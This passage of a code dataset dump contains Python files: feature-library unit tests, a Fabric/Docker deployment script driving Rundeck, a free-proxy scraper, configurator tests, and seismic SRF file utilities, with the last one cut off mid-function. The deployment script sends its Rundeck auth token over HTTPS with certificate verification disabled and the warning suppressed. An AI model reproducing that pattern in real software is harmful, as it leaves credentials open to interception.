self.assertEqual(output_image, 2)\n self.assertListEqual(output_image.get_property(\"value_to_add\", get_one=False), [1, 1])\n\n\n def test_Feature_with_dummy_property(self):\n class FeatureConcreteClass(features.Feature):\n __distributed__ = False\n def get(self, *args, **kwargs):\n image = np.ones((2, 3))\n return image \n feature = FeatureConcreteClass(dummy_property=\"foo\")\n feature.update()\n output_image = feature.resolve()\n self.assertListEqual(output_image.get_property(\"dummy_property\", get_one=False), [\"foo\"])\n\n\n def test_Feature_plus_1(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n feature1 = FeatureAddValue(value_to_add=1)\n feature2 = FeatureAddValue(value_to_add=2)\n feature = feature1 + feature2\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image)\n self.assertEqual(output_image, 3)\n self.assertListEqual(output_image.get_property(\"value_to_add\", get_one=False), [1, 2])\n self.assertEqual(output_image.get_property(\"value_to_add\", get_one=True), 1)\n\n\n def test_Feature_plus_2(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n class FeatureMultiplyByValue(features.Feature):\n def get(self, image, value_to_multiply=0, **kwargs):\n image = image * value_to_multiply\n return image\n feature1 = FeatureAddValue(value_to_add=1)\n feature2 = FeatureMultiplyByValue(value_to_multiply=10)\n input_image = np.zeros((1, 1))\n feature12 = feature1 + feature2\n feature12.update()\n output_image12 = feature12.resolve(input_image)\n self.assertEqual(output_image12, 10)\n feature21 = feature2 + feature1\n output_image21 = feature21.resolve(input_image)\n self.assertEqual(output_image21, 1)\n\n\n def test_Feature_plus_3(self):\n class FeatureAppendImageOfShape(features.Feature):\n __distributed__ = False\n __list_merge_strategy__ = features.MERGE_STRATEGY_APPEND\n def get(self, *args, shape, **kwargs):\n image = np.zeros(shape)\n return image\n feature1 = FeatureAppendImageOfShape(shape=(1, 1))\n feature2 = FeatureAppendImageOfShape(shape=(2, 2))\n feature12 = feature1 + feature2\n feature12.update()\n output_image = feature12.resolve()\n self.assertIsInstance(output_image, list)\n self.assertIsInstance(output_image[0], Image)\n self.assertIsInstance(output_image[1], Image)\n self.assertEqual(output_image[0].shape, (1, 1))\n self.assertEqual(output_image[1].shape, (2, 2))\n\n\n def test_Feature_times_1(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n input_image = np.zeros((1, 1))\n feature0 = FeatureAddValue(value_to_add=1) * 0\n feature0.update()\n output_image0 = feature0.resolve(input_image)\n self.assertEqual(output_image0, 0)\n feature1 = FeatureAddValue(value_to_add=1) * 1\n feature1.update()\n output_image1 = feature1.resolve(input_image)\n self.assertEqual(output_image1, 1)\n feature05 = FeatureAddValue(value_to_add=1) * 0.5\n for _ in range(100):\n feature05.update()\n output_image05 = feature05.resolve(input_image)\n self.assertTrue(output_image05[0, 0] == 0 or output_image05[0, 0] == 1)\n\n\n def test_Feature_exp_1(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n feature = FeatureAddValue(value_to_add=1) ** 10\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image)\n self.assertEqual(output_image, 10)\n \n\n def test_Feature_property_memorability(self):\n class FeatureWithForgettableProperties(features.Feature):\n __property_memorability__ = 2\n def get(self, image, forgettable_property, **kwargs):\n return image\n feature = FeatureWithForgettableProperties(forgettable_property=1)\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image)\n self.assertIsNone(output_image.get_property(\"forgettable_property\", default=None))\n output_image = feature.resolve(input_image, property_memorability=2)\n self.assertEqual(output_image.get_property(\"forgettable_property\", default=None), 1)\n\n \n def test_Feature_with_overruled_property(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n feature = FeatureAddValue(value_to_add=1)\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image, value_to_add=10)\n self.assertEqual(output_image, 10)\n self.assertListEqual(output_image.get_property(\"value_to_add\", get_one=False), [10])\n self.assertEqual(output_image.get_property(\"value_to_add\", get_one=True), 10)\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645982114","text":"# coding=utf-8\nimport json\nfrom fabric.api import local, run, env, abort, settings, task, execute, roles\nfrom importlib import import_module\nimport abc\nimport requests\nimport time\nfrom retrying import Retrying\nfrom fabric.contrib.files import upload_template as _upload_template\nimport os\n\n\nclass DeploymentManager(object):\n @abc.abstractmethod\n def enable_node(self, node):\n pass\n\n @abc.abstractmethod\n def disable_node(self, node):\n pass\n\n\nclass NoSafeDeploymentManager(DeploymentManager):\n def enable_node(self, node):\n \"\"\" Null impl \"\"\"\n\n def disable_node(self, node):\n \"\"\" Null impl \"\"\"\n\n\ndef convert2bool(v):\n if isinstance(v, bool):\n return v\n return str(v).lower() in (\"yes\", \"y\", \"true\", \"t\", \"1\")\n\n\ndef manage_local():\n if not hasattr(env, \"is_local\"):\n env.is_local = False\n\n if env.is_local:\n env.run_func = local\n else:\n env.run_func = run\n\n\ndef check_node(query, headers=None):\n \"\"\"\n poll on state of execution until it gets a 'succeeded' status\n \"\"\"\n response = None\n try:\n if headers:\n response = requests.get(query, headers=headers, verify=False)\n else:\n response = requests.get(query, verify=False)\n print('waiting for enable node ...')\n except Exception as e:\n print(\"Error : {}\".format(e))\n\n # Return full response\n return response\n\n\nclass SafeDeploymentManager(DeploymentManager):\n # avoid the message output : InsecureRequestWarning: Unverified HTTPS request is being made.\n # Adding certificate verification is strongly advised.\n # See: https://urllib3.readthedocs.io/en/latest/security.html\n requests.packages.urllib3.disable_warnings()\n\n def __init__(self):\n super(SafeDeploymentManager, self).__init__()\n self.http_header = {'Content-Type': 'application/json',\n 'Accept': 'application/json',\n 'X-Rundeck-Auth-Token': env.rundeck_token}\n\n def enable_node(self, node):\n node = hostname2node(node)\n print(\"The {} node will be enabled\".format(node))\n\n args = {'argString': '-nodename {} -state enable'.format(node)}\n\n switch_power_on = requests.post(\"{}/api/18/job/{}/run\"\n .format(env.rundeck_url, env.rundeck_job, node),\n headers=self.http_header, data=json.dumps(args), verify=False)\n response = switch_power_on.json()\n\n request = '{}/api/18/execution/{}/state?{}'.format(env.rundeck_url, response['id'], env.rundeck_job)\n\n try:\n Retrying(stop_max_delay=60000, wait_fixed=500,\n retry_on_result=lambda resp: resp is None or\n resp.json().get('executionState') != 'SUCCEEDED')\\\n .call(check_node, request, self.http_header)\n except Exception as e:\n abort(\"The {} node cannot be enabled:\\n{}\".format(node, e))\n\n print(\"The {} node is enabled\".format(node))\n\n def disable_node(self, node):\n node = hostname2node(node)\n print(\"The {} node will be disabled\".format(node))\n\n args = {'argString': '-nodename {} -state disable'.format(node)}\n\n switch_power_off = requests.post(\"{}/api/18/job/{}/run\"\n .format(env.rundeck_url, env.rundeck_job, node),\n headers=self.http_header, data=json.dumps(args), verify=False)\n response = switch_power_off.json()\n\n request = '{}/api/18/execution/{}/state?{}'.format(env.rundeck_url, response['id'], env.rundeck_job)\n\n try:\n Retrying(stop_max_delay=60000, wait_fixed=500,\n retry_on_result=lambda resp: resp is None or\n resp.json().get('executionState') != 'SUCCEEDED')\\\n .call(check_node, request, self.http_header)\n except Exception as e:\n abort(\"The {} node cannot be disabled:\\n{}\".format(node, e))\n\n print(\"The {} node is disabled\".format(node))\n\n\ndef deploy_kirin_container_safe(server, node_manager, first_time=False):\n \"\"\" Restart kirin on a specific server,\n in a safe way if load balancers are available\n \"\"\"\n with settings(host_string=server):\n node_manager.disable_node(server)\n dc_filepath = '{path}/docker-compose_kirin.yml'.format(path=env.path)\n migrate(dc_filepath)\n restart(dc_filepath, first_time=first_time)\n test_deployment()\n node_manager.enable_node(server)\n\n\ndef deploy_kirin_beat_container_safe(server, first_time=False):\n \"\"\" Restart kirin on a specific server\n \"\"\"\n with settings(host_string=server):\n dc_filepath = '{path}/docker-compose_kirin-beat.yml'.format(path=env.path)\n restart(dc_filepath, first_time=first_time)\n\n\ndef pull_kirin_image():\n \"\"\"\n Retrieve new kirin image\n \"\"\"\n if not env.is_local:\n env.run_func('docker pull {image}:{new_tag}'.format(image=env.docker_image_kirin, new_tag=env.current_docker_tag))\n\n\ndef update_kirin_docker_tag():\n \"\"\"\n To tag the image, we pull the previous tag, tag it as our own and push it\n \"\"\"\n if not env.is_local:\n local('docker pull {image}:{prev_tag}'\n .format(image=env.docker_image_kirin, prev_tag=env.previous_docker_tag))\n local('docker tag {image}:{prev_tag} {image}:{new_tag}'\n .format(image=env.docker_image_kirin,\n prev_tag=env.previous_docker_tag,\n new_tag=env.current_docker_tag))\n local('docker push {image}:{new_tag}'\n .format(image=env.docker_image_kirin, new_tag=env.current_docker_tag))\n\n\n@task\ndef deploy(first_time=False):\n \"\"\"\n Deploy Kirin services\n \"\"\"\n first_time = convert2bool(first_time)\n manage_local()\n\n # Unless platform is empty, display status before\n if not first_time:\n print_status()\n update_kirin_docker_tag()\n execute(deploy_kirin, first_time=first_time)\n execute(deploy_kirin_beat, first_time=first_time)\n print_status()\n\n\ndef print_status():\n\n def check_and_print_response(query, header=None):\n response = check_node(query, header)\n if response is None or response.status_code != 200:\n return False\n else:\n print(\"\")\n print(\"curl {}\".format(query))\n print(response.json())\n print(\"\")\n return True\n\n api_root_global = env.kirin_host\n if env.is_local: # for a local deployment, port 80 is not mandatory\n api_root_global = '{}:{}'.format(env.kirin_host, env.kirin_host_port)\n request = 'http://{}/status'.format(api_root_global)\n try:\n Retrying(stop_max_delay=30000, wait_fixed=100,\n retry_on_result=lambda res: not res)\\\n .call(check_and_print_response, request)\n except Exception as e:\n abort(e)\n\n\n@task()\n@roles('kirin-beat')\ndef deploy_kirin_beat(first_time=False):\n \"\"\"\n Deploy Kirin beat\n :return:\n \"\"\"\n first_time = convert2bool(first_time)\n manage_local()\n\n if len(env.roledefs['kirin-beat']) != 1:\n abort('Error : Only one beat can exist, you provided kirin-beat role on {}'\n .format(env.roledefs['kirin-beat']))\n\n env.docker_nodename = hostname2node(env.host_string)\n upload_template('kirin.env', '{}'.format(env.path), context={'env': env})\n upload_template('docker-compose_kirin-beat.yml', '{}'.format(env.path), context={'env': env})\n\n # Deploy NewRelic\n if env.new_relic_key:\n upload_template('newrelic.ini', '{}'.format(env.path), context={'env': env})\n\n pull_kirin_image()\n\n deploy_kirin_beat_container_safe(env.host_string, first_time=first_time)\n\n # need to wait between both node execution because using same token\n time.sleep(5)\n\n\n@task()\n@roles('kirin')\ndef deploy_kirin(first_time=False):\n \"\"\"\n Deploy Kirin\n :return:\n \"\"\"\n first_time = convert2bool(first_time)\n manage_local()\n\n if env.use_load_balancer:\n node_manager = SafeDeploymentManager()\n else:\n node_manager = NoSafeDeploymentManager()\n\n env.docker_nodename = hostname2node(env.host_string)\n upload_template('kirin.env', '{}'.format(env.path), context={'env': env})\n upload_template('docker-compose_kirin.yml', '{}'.format(env.path), context={'env': env})\n\n # Deploy NewRelic\n if env.new_relic_key:\n upload_template('newrelic.ini', '{}'.format(env.path), context={'env': env})\n\n pull_kirin_image()\n\n deploy_kirin_container_safe(env.host_string, node_manager, first_time=first_time)\n\n # need to wait between both node execution because using same token\n time.sleep(5)\n\n\ndef remove_targeted_image(id_image):\n \"\"\" Remove an image \"\"\"\n with settings(warn_only=True):\n env.run_func('docker rmi {}'.format(id_image))\n\n\ndef remove_targeted_images():\n \"\"\" Remove several images \"\"\"\n images_to_remove = env.run_func(\"docker images | grep kirin | awk '{print $3}' && \"\n \"docker images -f dangling=true -q\")\n for image in images_to_remove.split('\\n'):\n remove_targeted_image(image.strip('\\r'))\n\n\ndef start_container(compose_file):\n \"\"\" Start targeted containers in daemon mode and restart them if crash \"\"\"\n env.run_func('docker-compose -f {} up --force-recreate -d'.format(compose_file))\n\n\ndef stop_container(compose_file):\n \"\"\" Stop targeted containers \"\"\"\n env.run_func('docker-compose -f {} stop'.format(compose_file))\n\n\ndef remove_container(compose_file):\n \"\"\" Remove targeted containers without asking confirmation and\n remove volumes associated with containers\n \"\"\"\n env.run_func('docker-compose -f {} rm -v -f'.format(compose_file))\n\n\ndef migrate(compose_file, revision='head'):\n env.run_func('docker-compose -f {} run --rm --no-deps kirin flask db upgrade {}'\n .format(compose_file, revision))\n\n\ndef restart(compose_file, first_time=False):\n \"\"\" Restart containers properly \"\"\"\n # Unless the platform is empty, previous container needs to be managed\n if not first_time:\n stop_container(compose_file)\n remove_container(compose_file)\n remove_targeted_images()\n start_container(compose_file)\n\n\ndef test_deployment():\n \"\"\" Verify api kirin is OK \"\"\"\n\n headers = {'Host': env.kirin_host}\n api_root_node = env.host_string\n if env.is_local: # for a local deployment, port 80 is not mandatory\n api_root_node = '{}:{}'.format(env.host_string, env.kirin_host_port)\n request = 'http://{}/status'.format(api_root_node)\n\n try:\n Retrying(stop_max_delay=30000, wait_fixed=100,\n retry_on_result=lambda resp: resp is None or resp.status_code != 200)\\\n .call(check_node, request, headers)\n except Exception as e:\n abort(e)\n print(\"{} is OK\".format(request))\n\n\n@task\ndef use(module_path, *args):\n pos = module_path.rfind(\".\")\n if pos == -1:\n path, f_name = module_path, module_path\n else:\n path, f_name = module_path[:pos], module_path[pos+1:]\n module = import_module(path)\n getattr(module, f_name)(*args)\n\n\ndef hostname2node(host):\n \"\"\" Return the node name equivalent to hostname\"\"\"\n # clean the host which can contain usernames from fabric\n # for example : user@hostname.suffix -> hostname\n suffix_to_remove = getattr(env, 'hostname_suffix_to_remove', '')\n host_only = host.replace(env.user + '@', '').replace(suffix_to_remove, '')\n\n return host_only\n\n\ndef upload_template(filename, destination, context=None, **kwargs):\n kwargs['use_jinja'] = True\n kwargs['template_dir'] = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'templates')\n kwargs['context'] = context\n kwargs['use_sudo'] = False\n kwargs['backup'] = False\n _upload_template(filename, destination, **kwargs)\n","sub_path":"fabfile/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":11980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"220013823","text":"#coding: utf-8\n__author__ = 'liufei'\n\nimport sys, time, threading\nfrom proxier.youdaili import youdaili\nfrom proxier.kuaidaili import kuaidaili\nfrom proxier.swei360 import swei360\nfrom proxier.xicidaili import xicidaili\nfrom lib.base import base\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nclass spider:\n def __init__(self, iptype):\n self.iptype = iptype # 0: 抓取快代理&西刺的高匿代理 # 1: 抓取有代理的所有免费代理 # other: 抓取快代理&西刺&有代理的所有免费代理\n self.ydl = youdaili()\n self.kdl = kuaidaili()\n self.sw360 = swei360()\n self.xcdl = xicidaili()\n\n def run(self, filename, updateGap):\n while True:\n if self.iptype == 0: # 抓取360三维代理&西刺的高匿代理\n self.xcdl.save(filename, \"w\")\n self.sw360.save(filename, \"a\")\n elif self.iptype == 1: # 抓取有代理的所有免费代理\n self.ydl.save(filename, \"w\")\n else: # 抓取360三维代理&西刺&有代理的所有免费代理\n self.ydl.save(filename, \"w\")\n self.xcdl.save(filename, \"a\")\n self.sw360.save(filename, \"a\")\n time.sleep(updateGap)\n\nif __name__ == \"__main__\":\n sp = spider(0)\n threads = []\n threads.append(threading.Thread(target=sp.run, args=(\"proxies.txt\", 300)))\n threads.append(threading.Thread(target=base.httpService))\n for t in threads:\n t.setDaemon(True)\n t.start()\n for t in threads:\n t.join()\n\n # 访问抓取的代理地址, 例: http://127.0.0.1:8083/proxies.txt\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"568355831","text":"import unittest\nimport vodka.config\nimport vodka.config.configurator\nimport sys\n\n\nclass Handler(vodka.config.Handler):\n a = vodka.config.Attribute(str)\n b = vodka.config.Attribute(str, default=\"something\")\n c = vodka.config.Attribute(list, default=[])\n d = vodka.config.Attribute(dict, default={})\n e = vodka.config.Attribute(dict, default={})\n f = vodka.config.Attribute(dict, help_text=\"manually\")\n\n @classmethod\n def configure_e(cls, configurator, cfg, path):\n _cfg = {}\n configurator.configure(_cfg, HandlerE, path=\"{}.{}\".format(path, \"test\"))\n cfg[\"e\"] = {\"test\": _cfg}\n\n\nclass HandlerE(vodka.config.Handler):\n a = vodka.config.Attribute(str)\n b = vodka.config.Attribute(str, default=\"else\")\n\n\nclass Configurator(vodka.config.configurator.Configurator):\n def set_values(self, **kwargs):\n self.prompt_values = kwargs\n\n def prompt(self, k, default=None, *args, **kwargs):\n return self.prompt_values.get(k, default)\n\n\nclass TestConfigurator(unittest.TestCase):\n def test_configurator(self):\n configurator = Configurator(None)\n\n cfg = {}\n configurator.set_values(\n **{\n \"a\": \"what\",\n \"b\": \"something\",\n \"c\": \"nope\",\n \"d\": \"nope\",\n \"e.test.a\": \"who\",\n }\n )\n configurator.configure(cfg, Handler)\n self.assertEqual(\n cfg,\n {\"a\": \"what\", \"b\": \"something\", \"e\": {\"test\": {\"a\": \"who\", \"b\": \"else\"}}},\n )\n\n self.assertEqual(configurator.action_required, [\"f: manually\"])\n\n def test_configurator_skip_defaults(self):\n configurator = Configurator(None, skip_defaults=True)\n\n cfg = {}\n configurator.set_values(\n **{\n \"a\": \"what\",\n \"b\": \"other\",\n \"c\": \"nope\",\n \"d\": \"nope\",\n \"e.test.a\": \"who\",\n \"e.test.b\": \"where\",\n }\n )\n configurator.configure(cfg, Handler)\n self.assertEqual(\n cfg,\n {\"a\": \"what\", \"b\": \"something\", \"e\": {\"test\": {\"a\": \"who\", \"b\": \"else\"}}},\n )\n\n def test_configurator_override_defaults(self):\n configurator = Configurator(None)\n\n cfg = {}\n configurator.set_values(\n **{\n \"a\": \"what\",\n \"b\": \"other\",\n \"c\": \"nope\",\n \"d\": \"nope\",\n \"e.test.a\": \"who\",\n \"e.test.b\": \"where\",\n }\n )\n configurator.configure(cfg, Handler)\n self.assertEqual(\n cfg, {\"a\": \"what\", \"b\": \"other\", \"e\": {\"test\": {\"a\": \"who\", \"b\": \"where\"}}}\n )\n\n def test_configurator_skip_existing(self):\n configurator = Configurator(None)\n\n cfg = {\"a\": \"why\"}\n configurator.set_values(\n **{\n \"a\": \"what\",\n \"b\": \"other\",\n \"c\": \"nope\",\n \"d\": \"nope\",\n \"e.test.a\": \"who\",\n \"e.test.b\": \"where\",\n }\n )\n configurator.configure(cfg, Handler)\n self.assertEqual(\n cfg, {\"a\": \"why\", \"b\": \"other\", \"e\": {\"test\": {\"a\": \"who\", \"b\": \"where\"}}}\n )\n","sub_path":"tests/test_configurator.py","file_name":"test_configurator.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"691063","text":"\"\"\"\nUtilities for Graves Standard Rupture Format (SRF).\n\nSRF is documented at http://epicenter.usc.edu/cmeportal/docs/srf4.pdf\n\"\"\"\n\ndef open_(fh, mode='r'):\n \"\"\"\n Open a regular or compressed file if not already opened.\n \"\"\"\n if isinstance(fh, basestring):\n import os, gzip\n fh = os.path.expanduser(fh)\n if fh.endswith('.gz'):\n fh = gzip.open(fh, mode)\n else:\n fh = open(fh, mode)\n return fh\n\ndef read(fh):\n \"\"\"\n Read SRF file.\n\n Given file handle fh, return SRF metadata/data pair of dictionaries. The first\n dict 'meta' contains scalars and metadata. The second dict 'data' contains\n NumPy arrays.\n \"\"\"\n import numpy as np\n\n fh = open_(fh)\n\n # mks units\n u_km = 1000\n u_cm = 0.01\n u_cm2 = 0.0001\n\n # header block\n meta = {}\n meta['version'] = fh.next().split()[0]\n s = fh.next().split()\n if s[0] == 'PLANE':\n plane = []\n for i in range(int(s[1])):\n s = fh.next().split() + fh.next().split()\n if len(s) != 11:\n raise Exception('error reading %s' % fh.name)\n j, k = int(s[2]), int(s[3])\n x, y = float(s[4]) * u_km, float(s[5]) * u_km\n seg = {\n 'shape': [j, k],\n 'length': [x, y],\n 'area': x * y,\n 'delta': [x / j, y / k],\n 'topcenter': [float(s[0]), float(s[1]), float(s[8])],\n 'strike': float(s[6]),\n 'dip': float(s[7]),\n 'hypocenter': [float(s[9]) * u_km, float(s[10]) * u_km],\n }\n plane += [seg]\n s = fh.next().split()\n meta['plane'] = plane\n if s[0] != 'POINTS':\n raise Exception('error reading %s' % fh.name)\n meta['nsource'] = n = int(s[1])\n\n # data block\n data = {}\n keys_2i = 'nt1', 'nt2', 'nt3'\n keys_2f = (\n 'lon', 'lat', 'dep', 'stk', 'dip', 'rake', 'area',\n 't0', 'dt', 'slip1', 'slip2', 'slip3',\n )\n for k in keys_2i:\n data[k] = np.empty(n, 'i')\n for k in keys_2f:\n data[k] = np.empty(n, 'f')\n sv1, sv2, sv3 = [], [], []\n for i in range(n):\n k = fh.next().split() + fh.next().split()\n if len(k) != 15:\n raise Exception('error reading %s %s' % (fh.name, i))\n data['lon'][i] = float(k[0])\n data['lat'][i] = float(k[1])\n data['dep'][i] = float(k[2]) * u_km\n data['stk'][i] = float(k[3])\n data['dip'][i] = float(k[4])\n data['rake'][i] = float(k[8])\n data['area'][i] = float(k[5]) * u_cm2\n data['t0'][i] = float(k[6])\n data['dt'][i] = float(k[7])\n data['slip1'][i] = float(k[9]) * u_cm\n data['slip2'][i] = float(k[11]) * u_cm\n data['slip3'][i] = float(k[13]) * u_cm\n data['nt1'][i] = nt1 = int(k[10])\n data['nt2'][i] = nt2 = int(k[12])\n data['nt3'][i] = nt3 = int(k[14])\n sv = []\n n = np.cumsum([nt1, nt2, nt3])\n while len(sv) < n[-1]:\n sv += fh.next().split()\n if len(sv) != n[-1]:\n raise Exception('error reading %s %s' % (fh.name, i))\n sv1 += [float(f) * u_cm for f in sv[:n[0]]]\n sv2 += [float(f) * u_cm for f in sv[n[0]:n[1]]]\n sv3 += [float(f) * u_cm for f in sv[n[1]:]]\n\n # slip velocity arrays\n data['sv1'] = sv1 = np.array(sv1, 'f')\n data['sv2'] = sv2 = np.array(sv2, 'f')\n data['sv3'] = sv3 = np.array(sv3, 'f')\n\n # reshape array (only handles a single plane for now)\n if len(meta['plane']) == 1:\n n = meta['plane'][0]['shape']\n for k in keys_2f + keys_2i:\n data[k] = data[k].reshape(n[::-1]).T\n\n # useful meta data\n i1 = (data['nt1'] > 0).sum()\n i2 = (data['nt2'] > 0).sum()\n i3 = (data['nt3'] > 0).sum()\n meta['nsource_nonzero'] = i1 + i2 + i3\n i = np.argmin(data['t0'])\n meta['hypocenter'] = [\n float(data['lon'].flat[i]),\n float(data['lat'].flat[i]),\n float(data['dep'].flat[i]),\n ]\n meta['area'] = a = float(data['area'].sum(dtype='d'))\n meta['potency'] = p = float(np.sqrt(\n (data['area'] * data['slip1']).sum(dtype='d') ** 2 +\n (data['area'] * data['slip2']).sum(dtype='d') ** 2 +\n (data['area'] * data['slip3']).sum(dtype='d') ** 2\n ))\n meta['displacement'] = p / a\n\n return meta, data\n\n\ndef write(fh, srf):\n \"\"\"\n Write SRF file.\n \"\"\"\n import numpy as np\n\n fh = open_(fh)\n\n # mks units\n u_km = 0.001\n u_cm = 100\n u_cm2 = 10000\n\n # header block\n meta, data = srf\n fh.write('%s\\n' % meta['version'])\n if 'plane' in meta:\n for i, seg in enumerate(meta['plane']):\n fh.write('PLANE %s\\n%s %s %s %s %s %s\\n%s %s %s %s %s\\n' % (\n i + 1,\n seg['topcenter'][0],\n seg['topcenter'][1],\n seg['shape'][0],\n seg['shape'][1],\n seg['length'][0] * u_km,\n seg['length'][1] * u_km,\n seg['strike'],\n seg['dip'],\n seg['topcenter'][2],\n seg['hypocenter'][0] * u_km,\n seg['hypocenter'][1] * u_km,\n ))\n\n # data block\n n = meta['nsource']\n fh.write(('POINTS %s\\n' % n))\n i1 = 0\n i2 = 0\n i3 = 0\n for i in range(n):\n fh.write('%s %s %s %s %s %s %s %s\\n%s %s %s %s %s %s %s\\n' % (\n data['lon'][i],\n data['lat'][i],\n data['dep'][i] * u_km,\n data['stk'][i],\n data['dip'][i],\n data['area'][i] * u_cm2,\n data['t0'][i],\n data['dt'][i],\n data['rake'][i],\n data['slip1'][i] * u_cm,\n data['nt1'][i],\n data['slip2'][i] * u_cm,\n data['nt2'][i],\n data['slip3'][i] * u_cm,\n data['nt3'][i],\n ))\n n1 = data['nt1'][i]\n n2 = data['nt2'][i]\n n3 = data['nt3'][i]\n s1 = data['sv1'][i1:i1+n1] * u_cm\n s2 = data['sv2'][i2:i2+n2] * u_cm\n s3 = data['sv3'][i3:i3+n3] * u_cm\n s = np.concatenate([s1, s2, s3])\n i = s.size // 6 * 6\n np.savetxt(fh, s[:i].reshape([-1,6]), '%13.5e', '')\n np.savetxt(fh, s[i:].reshape([1,-1]), '%13.5e', '')\n i1 += n1\n i2 += n2\n i3 += n3\n return\n\n\ndef write_sord(path, srf, delta=(1,1,1), proj=None, dbytes=4):\n \"\"\"\n Write SORD potency tensor input files.\n\n Parameters\n ----------\n path: file name root\n srf: (meta, data) SRF dictionaries\n delta: grid step size (dx, dy, dz)\n proj: function to project lon/lat to logical model coordinates\n dbytes: 4 or 8\n \"\"\"\n from . import coord\n\n # setup\n meta, data = srf\n i_ = 'i%s' % dbytes\n f_ = 'f%s' % dbytes\n\n # time\n i1 = data['nt1'] > 0\n i2 = data['nt2'] > 0\n i3 = data['nt3'] > 0\n with open(path + 'nt.bin', 'wb') as f1:\n with open(path + 'dt.bin', 'wb') as f2:\n with open(path + 't0.bin', 'wb') as f3:\n data['nt1'][i1].astype(i_).tofile(f1)\n data['nt2'][i2].astype(i_).tofile(f1)\n data['nt3'][i3].astype(i_).tofile(f1)\n for i in i1, i2, i3:\n data['dt'][i].astype(f_).tofile(f2)\n data['t0'][i].astype(f_).tofile(f3)\n\n # coordinates\n x = data['lon']\n y = data['lat']\n z = data['dep']\n if proj:\n rot = coord.rotation(x, y, proj)[1]\n x, y = proj(x, y)\n else:\n rot = 0.0\n x /= delta[0]\n y /= delta[1]\n z /= delta[2]\n with open(path + 'xi1.bin', 'wb') as f1:\n with open(path + 'xi2.bin', 'wb') as f2:\n with open(path + 'xi3.bin', 'wb') as f3:\n for i in i1, i2, i3:\n x[i].astype(f_).tofile(f1)\n y[i].astype(f_).tofile(f2)\n z[i].astype(f_).tofile(f3)\n del(x, y, z)\n\n # fault local coordinate system\n s1, s2, n = coord.slip_vectors(data['stk'] + rot, data['dip'], data['rake'])\n p1 = data['area'] * coord.potency_tensor(n, s1)\n p2 = data['area'] * coord.potency_tensor(n, s2)\n p3 = data['area'] * coord.potency_tensor(n, n)\n del(s1, s2, n)\n\n # tensor components\n with open(path + 'w11.bin', 'wb') as f11:\n with open(path + 'w23.bin', 'wb') as f22:\n with open(path + 'w33.bin', 'wb') as f33:\n for p, i in (p1, i1), (p2, i2), (p3, i3):\n p[0,0,i].astype(f_).tofile(f11)\n p[0,1,i].astype(f_).tofile(f22)\n p[0,2,i].astype(f_).tofile(f33)\n with open(path + 'w23.bin', 'wb') as f23:\n with open(path + 'w31.bin', 'wb') as f31:\n with open(path + 'w12.bin', 'wb') as f12:\n for p, i in (p1, i1), (p2, i2), (p3, i3):\n p[1,0,i].astype(f_).tofile(f23)\n p[1,1,i].astype(f_).tofile(f31)\n p[1,2,i].astype(f_).tofile(f12)\n del(p1, p2, p3)\n\n # time history\n i1 = 0\n i2 = 0\n i3 = 0\n with open(path + 'history.bin', 'wb') as fh:\n n = meta['nsource']\n for i in range(n):\n n = data['nt1'][i]\n s = data['sv1'][i1:i1+n].cumsum() * data['dt'][i]\n s.astype(f_).tofile(fh)\n i1 += n\n for i in range(n):\n n = data['nt2'][i]\n s = data['sv2'][i2:i2+n].cumsum() * data['dt'][i]\n s.astype(f_).tofile(fh)\n i2 += n\n for i in range(n):\n n = data['nt3'][i]\n s = data['sv3'][i3:i3+n].cumsum() * data['dt'][i]\n s.astype(f_).tofile(fh)\n i3 += n\n return\n\n\ndef write_awp(fh, srf, t, mu, lam=0.0, delta=1.0, proj=None,\n binary=True, interp='linear'):\n \"\"\"\n Write ODC-AWP moment rate input file.\n\n Parameters\n ----------\n fh: file handle\n srf: (meta, data) SRF dictionaries\n t: array of time values\n mu, lam: elastic moduli\n delta: grid step size, single value or [dx, dy, dz]\n proj: Function to project lon/lat to logical model coordinates\n binary: If true, write AWP binary format, otherwise text format.\n interp: interpolation method, linear or cubic\n \"\"\"\n import numpy as np\n from . import coord, interp\n\n fh = open_(fh)\n\n # parameters\n meta, data = srf\n if type(delta) not in (tuple, list):\n delta = delta, delta, delta\n x = data['lon']\n y = data['lat']\n z = data['dep']\n dt = data['dt']\n t0 = data['t0']\n stk = data['stk']\n dip = data['dip']\n rake = data['rake']\n area = data['area']\n\n # coordinates\n if proj:\n rot = coord.rotation(x, y, proj)[1]\n x, y = proj(x, y)\n else:\n rot = 0.0\n jj = (x / delta[0] + 1.5).astype('i')\n kk = (y / delta[1] + 1.5).astype('i')\n ll = (z / delta[2] + 1.5).astype('i')\n del(x, y, z)\n\n # moment tensor components\n s1, s2, n = coord.slip_vectors(stk + rot, dip, rake)\n m1 = mu * area * coord.potency_tensor(n, s1) * 2.0\n m2 = mu * area * coord.potency_tensor(n, s2) * 2.0\n m3 = lam * area * coord.potency_tensor(n, n) * 2.0\n del(s1, s2, n)\n\n # write file\n s = np.zeros_like\n i1 = 0\n i2 = 0\n i3 = 0\n for i in range(dt.size):\n n1 = 